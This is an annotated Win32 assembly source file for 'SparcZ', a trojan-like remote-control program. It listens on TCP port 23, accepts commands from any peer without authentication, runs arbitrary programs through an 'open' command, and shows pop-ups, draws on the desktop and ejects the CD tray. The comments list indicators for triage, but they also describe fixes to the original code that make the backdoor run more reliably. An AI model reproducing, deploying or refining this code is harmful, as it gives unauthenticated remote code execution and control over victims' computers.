
📄 sparcz.asm

📁 用win32汇编编写的类木马的东西
; SparcZ - A Funny little Network utility
; by ronybc ( url: http://www.ronybc.8k.com )

.486p
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include wsock32.inc
include kernel32.inc
include gdi32.inc
include winmm.inc
includelib user32.lib
includelib wsock32.lib
includelib kernel32.lib
includelib gdi32.lib
includelib winmm.lib

include shell32.inc
includelib shell32.lib

.data
; Fixed strings and buffers. The log path, banner text and command words
; below are the literal strings this program carries, so they double as
; static indicators when triaging a binary or a host.
ClassName db "Kunthrandam",0    ; not referenced by any code in this file
AppName   db "SPARCz",0         ; caption of the message box raised by the "box" command
fname1    db "C:\Zerver.log",0  ; log file: client addresses and every received command line are appended here
ftxt1     db "connected from : ",0  ; prefix of the per-connection log line

; Banner sent to each client immediately after accept().
welcome   db 13,10,
             "You are connected to -",13,10,13,10,
             "     __  __   __   __   ___________________________",13,10,
             "    (_  |__) |__| |__) / ",13,10,
             " _____) |    |  | |  \ \__  ZERVER BY RONYBC ",13,10,
             13,10,13,10,13,10,0

; Replies sent back to the client.
killed    db "You killed that poor Zerver..! ",13,10,0  ; reply to "kill"
thankz    db "bye.... visit http://www.ronybc.8k.com",13,10,0  ; reply to "bye"
gotit     db "ok..... ",0       ; sent after a command has been carried out
errrr     db "error.. ",0       ; sent when no command word matches

; Command words. The dispatcher compares only as many characters as the
; word is long, so each of these is matched as a prefix of the line.
cm00      db "open",0           ; ShellExecute "open" on the rest of the line
cm01      db "box",0            ; show the rest of the line in a message box
cm02      db "kill",0           ; close both sockets and leave the program
cm03      db "bye",0            ; drop this client and wait for the next one
cm04      db "cd",0             ; "cdopen" / "cdclos...": move the CD tray via MCI
cm05      db "line",0           ; draw fixed lines on the desktop DC
cm06      db "msg",0            ; draw the rest of the line on the desktop DC
mci1      db "set cdaudio door open",0
mci2      db "set cdaudio door closed",0
mci3      db 0                  ; handed to mciSendString as the return-string buffer with length 0

; buff receives one command line from the network. The author's own note on
; this line read "vulnerable to buffer overflow attacks": the receive loop has
; to keep its writes inside these 512 bytes. buff2 is declared directly after
; it, so it is the first thing a write past the end of buff would reach.
buff      db 512 dup (0)
buff2     db 512 dup (0)        ; scratch: connection log line and the command-prefix copy

.data?
; Uninitialised state shared by the whole program (single connection at a time).
s1        SOCKET ?              ; listening socket created and bound in start
s2        SOCKET ?              ; socket of the currently connected client
sin1      sockaddr_in <>        ; local address handed to bind
sin2      sockaddr_in <>        ; peer address filled in by accept
wsaData   WSADATA <>            ; filled in by WSAStartup
hFile     dd ?                  ; handle of the log file while it is open
fwritten  dd ?                  ; byte count output of WriteFile; never read back
temp      dd ?                  ; scratch value reused for several purposes (accept address length, inet_ntoa result, log line length)
deskdc    HDC ?                 ; desktop device context used by "line" and "msg"
font      LOGFONT <>            ; font description filled by SystemParametersInfo for "msg"


.code

;-----------------------------------------------------------------------
; start - program entry point.
; Initialises Winsock, creates a TCP socket and binds it to port 23 on
; every local interface (sin_addr = 0), then starts listening with a
; backlog of 1 and enters the accept loop at next_user.
; If bind fails (which is also where an earlier socket() failure ends
; up), Winsock is shut down and the entry point returns 0.
; Host-side indicator: a listener on TCP 23 owned by this process.
;-----------------------------------------------------------------------
start:
    invoke WSAStartup,0101h,OFFSET wsaData  ; request Winsock 1.1
    invoke socket,PF_INET,SOCK_STREAM,0
    mov s1,eax

    ; Fill in the local address: AF_INET, any interface, port 23.
    invoke htons,23                         ; telnet port, network byte order
    mov sin1.sin_port,ax
    mov sin1.sin_family,AF_INET
    sub eax,eax
    mov sin1.sin_addr,eax                   ; 0 = all local interfaces

    invoke bind,s1,OFFSET sin1,SIZEOF sockaddr_in
    cmp eax,SOCKET_ERROR
    je @F                                   ; port unavailable: give up
    invoke listen,s1,1
    jmp next_user

@@:
    invoke WSACleanup
    xor eax,eax
    ret
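;-----------------------------------------------------------------------
; next_user - drop the previous client (if any), accept the next one,
; send the banner, and record the peer address.
;
; There is no authentication step: whoever connects is handed straight
; to the command loop at next_command.
;
; The line "connected from : <dotted address>" + CR,LF is appended to
; C:\Zerver.log and also echoed to the client, followed by "ok..... ".
;
; Fixes over the original:
;  - the address was copied after the NUL that terminates the prefix and
;    the line ending was stored as the dword 0A0D0000h, so every log
;    line carried embedded NUL bytes; the line is now plain text;
;  - a failed accept() no longer falls through to logging and sending on
;    an invalid socket;
;  - a failed CreateFile no longer passes INVALID_HANDLE_VALUE to the
;    file calls.
; Uses: eax, ecx, edx (API calls), edi; temp, hFile, s2, sin2, buff2.
;-----------------------------------------------------------------------
next_user:
    invoke closesocket,s2                   ; harmless failure when no client was connected
    mov temp,SIZEOF sockaddr_in             ; in/out address length for accept
    invoke accept,s1,ADDR sin2,ADDR temp
    mov s2,eax
    cmp eax,INVALID_SOCKET
    je next_user                            ; nothing accepted: wait again
    invoke send,s2,ADDR welcome,SIZEOF welcome,0

    ; Build the log line in buff2.
    mov eax,sin2.sin_addr                   ; peer IPv4 address
    invoke inet_ntoa,eax
    mov temp,eax                            ; temp = pointer to dotted string
    mov edi,OFFSET buff2
    invoke lstrcpy,edi,ADDR ftxt1
    add edi,SIZEOF ftxt1 - 1                ; continue on top of the prefix's NUL
    invoke lstrcpy,edi,temp
    invoke lstrlen,temp
    add edi,eax
    mov word ptr [edi],0A0Dh                ; CR,LF (stored low byte first)
    add edi,2
    sub edi,OFFSET buff2
    mov temp,edi                            ; temp = length of the line

    ; Append it to the log file.
    invoke CreateFile,ADDR fname1,GENERIC_WRITE,FILE_SHARE_READ,0,
                      OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
    mov hFile,eax
    cmp eax,INVALID_HANDLE_VALUE
    je @F                                   ; log unavailable: skip the write
    invoke SetFilePointer,hFile,0,0,FILE_END
    invoke WriteFile,hFile,ADDR buff2,temp,ADDR fwritten,0
    invoke CloseHandle,hFile
@@:
    invoke send,s2,ADDR buff2,temp,0        ; echo the same line to the client
    invoke send,s2,ADDR gotit,SIZEOF gotit,0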
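;-----------------------------------------------------------------------
; next_command / crecv - read one command line from the client into buff.
;
; Everything read here comes from an unauthenticated network peer and is
; untrusted. Data is appended at edi until a chunk ends in LF (0Ah).
;
; Fixes over the original:
;  - every recv asked for 500 bytes no matter how much of the 512-byte
;    buffer was already used, so a line sent in several pieces ran past
;    the end of buff into the data behind it. The request is now limited
;    to the space left, the last byte stays reserved for the terminating
;    NUL, and a client whose line does not fit is disconnected;
;  - a backspace (08h) arriving as the very first byte moved edi in
;    front of buff; the erase is now clamped to the buffer start and the
;    erased bytes are zeroed instead of the bytes after them.
; As before, only the last byte of each received chunk is examined.
; On fall-through: buff holds a NUL-terminated line ending in LF.
; Uses: eax, ecx, edx, edi (plus whatever clrbuff clobbers).
;-----------------------------------------------------------------------
next_command:
    mov edi,OFFSET buff
    mov eax,SIZEOF buff
    call clrbuff
    mov edi,OFFSET buff                     ; edi = write position
crecv:
    mov ecx,OFFSET buff + SIZEOF buff - 1   ; one past the last usable byte
    sub ecx,edi                             ; ecx = bytes still free
    jbe next_user                           ; line does not fit: drop the client
    invoke recv,s2,edi,ecx,0
    test eax,eax
    jz next_user                            ; peer closed the connection
    cmp eax,SOCKET_ERROR
    je next_user
    add edi,eax
    mov byte ptr [edi],0                    ; keep the line NUL-terminated
    mov al,[edi-1]                          ; last byte of this chunk
    cmp al,08h                              ; backspace?
    jne @F
    dec edi                                 ; discard the backspace itself
    cmp edi,OFFSET buff
    je crecv_erased                         ; nothing in front of it to erase
    dec edi                                 ; erase the preceding character
crecv_erased:
    mov word ptr [edi],0
    jmp crecv
@@:
    cmp al,0Ah                              ; line complete?
    jne crecv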
    ; Append the received line to C:\Zerver.log exactly as it arrived.
    ; The bytes are peer-controlled and written unmodified, so log entries
    ; are not a trustworthy record on their own (a client can send text
    ; that looks like other entries). Return values are not checked.
    invoke CreateFile,OFFSET fname1,GENERIC_WRITE,FILE_SHARE_READ,NULL,
                      OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
    mov hFile,eax
    invoke SetFilePointer,eax,0,NULL,FILE_END   ; seek to end: append
    invoke lstrlen,OFFSET buff
    invoke WriteFile,hFile,OFFSET buff,eax,OFFSET fwritten,NULL
    invoke CloseHandle,hFile

    ; Command dispatch.
    ; For each command word, the first (SIZEOF word - 1) characters of the
    ; line are copied into buff2 and compared case-insensitively with the
    ; word. Only that prefix is compared, so any line that merely starts
    ; with a command word selects its handler.
    ; TRYCMD expands to the same four instructions the original repeated
    ; by hand for every word.
TRYCMD MACRO cmdword:REQ, handler:REQ
    invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cmdword
    invoke lstrcmpi,ADDR buff2,ADDR cmdword
    or eax,eax
    jz handler
ENDM

    TRYCMD cm06,dmsg        ; "msg"
    TRYCMD cm05,dline       ; "line"
    TRYCMD cm04,cdrom       ; "cd"
    TRYCMD cm03,byebye      ; "bye"
    TRYCMD cm02,killer      ; "kill"
    TRYCMD cm01,msgbx       ; "box"

    ; Last candidate, "open": anything else is answered with the error
    ; reply; a match falls through to the code that follows.
    invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm00
    invoke lstrcmpi,ADDR buff2,ADDR cm00
    or eax,eax
    jnz err

    ; "open" handler.
    ; The text after "open " (buff + 5) is handed to ShellExecute with the
    ; "open" verb. Because the peer is never authenticated, this lets any
    ; host that can reach the listening port start a program or open a
    ; document on this machine with the rights of this process. It is the
    ; most security-relevant path in the file.
    ; The four bytes starting at the last two characters of the line are
    ; zeroed first, which removes a trailing CR,LF.
    invoke lstrlen,ADDR buff
    xor ebx,ebx
    mov dword ptr buff[eax-2],ebx
    invoke ShellExecute,NULL,OFFSET cm00,OFFSET buff + 5,NULL,NULL,SW_SHOWNORMAL
    invoke send,s2,OFFSET gotit,SIZEOF gotit,0
    jmp next_command

; err - no command word matched (or "cd" had an unknown argument):
; send the error reply and read the next line.
err:
    invoke send,s2,OFFSET errrr,SIZEOF errrr,0
    jmp next_command

; msgbx - "box" command: show the rest of the line (buff + 3, trailing
; line ending included) in a topmost, system-modal information box titled
; "SPARCz". MessageBox only returns once the box is dismissed, so the "ok"
; reply and all further command handling wait for the local user.
msgbx:
    invoke MessageBox,NULL,OFFSET buff + 3,OFFSET AppName,
           MB_OK or MB_TOPMOST or MB_SYSTEMMODAL or MB_ICONINFORMATION
    invoke send,s2,OFFSET gotit,SIZEOF gotit,0
    jmp next_command
    
; dline - "line" command: draw three connected line segments at fixed
; coordinates straight onto the desktop device context, then reply "ok".
; The DC is obtained with GetDC(NULL) and released again before replying.
dline:
    invoke GetDC,NULL                       ; NULL window = whole screen
    mov deskdc,eax
    invoke MoveToEx,eax,100,300,NULL        ; starting point
    invoke LineTo,deskdc,250,100
    invoke LineTo,deskdc,550,400
    invoke LineTo,deskdc,600,430
    invoke ReleaseDC,NULL,deskdc
    invoke send,s2,OFFSET gotit,SIZEOF gotit,0
    jmp next_command
    
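;-----------------------------------------------------------------------
; dmsg - "msg" command: draw the text that follows "msg" onto the
; desktop device context at (100,200), using the icon-title font with
; its height set to 36, then reply "ok".
;
; Fixes over the original:
;  - the character count is lstrlen(buff) - 5 ("msg" plus CR,LF); for a
;    line shorter than that the count went negative and was passed to
;    TextOut as is. Drawing is now skipped unless the count is positive;
;  - the font created for each call was never deleted and the DC's
;    previous font was never selected back, leaking one GDI object per
;    command. The previous font is restored and the new one deleted.
; Uses: eax, ecx, edx (API calls); temp, deskdc, font; two stack slots.
;-----------------------------------------------------------------------
dmsg:
    invoke lstrlen,ADDR buff
    sub eax,3 + 2                           ; minus "msg" and the trailing CR,LF
    jle dmsg_done                           ; nothing to draw
    mov temp,eax                            ; temp = number of characters

    invoke GetDC,0                          ; desktop DC
    mov deskdc,eax
    invoke SystemParametersInfo,
           SPI_GETICONTITLELOGFONT,SIZEOF font,ADDR font,0
    mov font.lfHeight,36                    ; font size
    invoke CreateFontIndirect,ADDR font
    push eax                                ; keep the new font handle
    invoke SelectObject,deskdc,eax
    push eax                                ; keep the DC's previous font
    invoke TextOut,deskdc,100,200,OFFSET buff + 3,temp
    pop eax
    invoke SelectObject,deskdc,eax          ; put the previous font back
    pop eax
    invoke DeleteObject,eax                 ; free the font created above
    invoke ReleaseDC,0,deskdc
dmsg_done:
    invoke send,s2,ADDR gotit,SIZEOF gotit,0
    jmp next_command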
    
; cdrom - "cd" command: the four bytes right after "cd" (buff + 2) select
; the action. They are compared as one dword and, unlike the command
; words, case-sensitively: "open" opens the tray, "clos" closes it, and
; anything else gets the error reply. The character constants are written
; reversed ("nepo", "solc") because the dword is loaded low byte first.
cdrom:
    mov eax,dword ptr buff[2]
    cmp eax,"solc"
    je cdclose
    cmp eax,"nepo"
    jne err

cdopen:
    invoke mciSendString,OFFSET mci1,OFFSET mci3,0,NULL
    invoke send,s2,OFFSET gotit,SIZEOF gotit,0
    jmp next_command

cdclose:
    invoke mciSendString,OFFSET mci2,OFFSET mci3,0,NULL
    invoke send,s2,OFFSET gotit,SIZEOF gotit,0
    jmp next_command
    
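;-----------------------------------------------------------------------
; clrbuff - zero a buffer.
; In:    edi = start of the buffer
;        eax = size of the buffer in bytes
; Out:   nothing
; Clobb: eax, ecx, edi, flags
;
; The original ignored the size in eax and cleared dword by dword until
; it met a dword that was already zero. That left stale bytes behind any
; zero dword inside the buffer and, for a buffer with no zero dword,
; kept clearing past its end. The size passed by the caller is now
; honoured exactly.
;-----------------------------------------------------------------------
clrbuff:
    mov ecx,eax                             ; ecx = byte count
    xor eax,eax                             ; fill value
    cld                                     ; store forwards
    rep stosb
    ret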
    
; byebye - "bye" command: send the farewell text, then go back to
; next_user, which closes this client's socket and waits for the next
; connection. The listener itself keeps running.
byebye:
    invoke send,s2,OFFSET thankz,SIZEOF thankz,0
    jmp next_user
    
; killer - "kill" command: tell the client, close the listening socket
; and the client socket, shut Winsock down and return 0 from the entry
; point. Like every other command it needs no credentials, so any peer
; that can connect can stop the program.
killer:
    invoke send,s2,OFFSET killed,SIZEOF killed,0
    invoke closesocket,s1                   ; stop listening
    invoke closesocket,s2                   ; drop the client
    invoke WSACleanup
    sub eax,eax                             ; return value 0
    ret

end start
